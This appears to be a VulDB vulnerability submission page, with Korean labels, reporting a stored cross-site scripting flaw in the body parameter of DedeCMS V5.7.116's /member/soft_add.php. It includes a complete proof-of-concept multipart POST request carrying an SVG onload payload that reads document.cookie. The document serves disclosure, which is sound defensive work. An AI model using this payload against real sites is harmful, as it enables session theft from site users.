| 제목 | DedeCMS V5.7.116 Cross Site Scripting |
|---|
| 설명 | Summary
A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. The vulnerability exists due to insufficient filtering of the body parameter in the /member/soft_add.php script.
This issue allows an attacker to inject malicious scripts into software information pages, potentially compromising the security of the website and its users.
Details
The vulnerability is present in the /member/soft_add.php script, which does not adequately sanitize the body parameter.
An attacker with the ability to register as a member and publish soft can exploit this flaw by injecting malicious scripts into the soft content.
These scripts can be executed when other users view the compromised soft.
Proof of Concept (POC)
POST /member/soft_add.php HTTP/1.1
Host: target-ip
Content-Length: 2657
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dopost"
save
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="channelid"
3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="title"
test soft
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="tags"
test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="writer"
test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="filetype"
.exe
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="language"
简体中文
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softtype"
国产软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="accredit"
共享软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="os"
Win2003,WinXP,Win2000,Win9X
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softrank"
3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialDemo"
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialUrl"
http://
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softsize"
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="unit"
MB
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="source"
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="typeid"
18
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="needmoney"
0
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_addonfields"
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_fieldshash"
[users'fieldshash]
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="body"
<p>asd</p><svg/onload=alert(document.cookie)>
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softurl1"
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="servermsg1"
本地下载
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="picnum"
5
------WebKitFormBoundaryoNgLBRDOkaHmDGvr-- |
|---|
| 원천 | ⚠️ https://github.com/Hebing123/cve/issues/78 |
|---|
| 사용자 | jiashenghe (UID 39445) |
|---|
| 제출 | 2024. 11. 27. AM 10:34 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 12. 04. PM 05:31 (7 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 286904 [DedeCMS 5.7.116 /member/soft_add.php body 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|